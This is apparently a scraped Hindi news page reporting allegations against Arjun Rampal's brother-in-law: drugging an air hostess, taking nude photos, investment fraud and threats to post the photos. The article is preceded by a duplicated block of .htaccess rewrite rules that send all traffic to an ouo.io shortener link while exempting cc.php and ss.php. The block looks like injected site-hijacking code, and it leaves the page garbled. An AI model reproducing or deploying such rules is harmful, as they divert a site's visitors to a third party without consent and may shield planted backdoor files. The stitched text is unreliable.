
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 860
Nextमुंबई। बॉलीवुड अभिनेता अर्जुन रामपाल के जीजा अमित गिल के खिलाफ एक एयरहोस्टेस से छेड़छाड़ का मामला दर्ज किया गया है। जानकारी के मुताबिक, अर्जुन रामपाल की बहन कोमल के पति अमित ने एक एयरहोस्टेस के न्यूड फोटो ऑनलाइन करने की धमकी भी दी।
दरअसल, पीड़ित एयरहोस्टेस अमित की इन्वेस्टमेंट क्लांइट है और उसने उसे मिलने के लिए अपने घर आनंद विला पर बुलाया था। इसके बाद अमित ने उसकी ड्रिंक में बेहोशी की दवा मिलाकर उसके न्यूड फोटो क्लिक कर लिए। रिपोर्ट्स के मुताबिक, एयरहोस्टेस एक प्राइवेट एयरलाइन में काम करती है। अमित ने उसे बहला-फुसलाकर इस वादे के साथ 18 लाख रुपए इन्वेस्ट करा लिए कि वो उसे अच्छा रिटर्न दिलाएगा। हालांकि बाद में अमित ने न तो उसे उसका मूलधन (18 लाख रुपए) लौटाए और ना ही उस पर 6 लाख रुपए का ब्याज दिया। जब एयरहोस्टेस ने अपने पैसे के बारे में अमित से पूछा तो उसने उसे चेक दिया। लेकिन वह भी बाउंस हो गया। बाद में अमित ने उसके खाते में सिर्फ 12 लाख रुपए ही भेजे। इस पर एयरहोस्टेस ने कहा कि मेरा बाकी पैसा भी लौटाओ तो अमित ने यह कहकर धमकाना शुरू कर दिया कि अगर ज्यादा बोली तो न्यूड फोटो ऑनलाइन कर दूंगा। इसके बाद एयरहोस्टेस ने अमित के खिलाफ धोखाधड़ी और छेड़छाड़ का मामला दर्ज कराया है।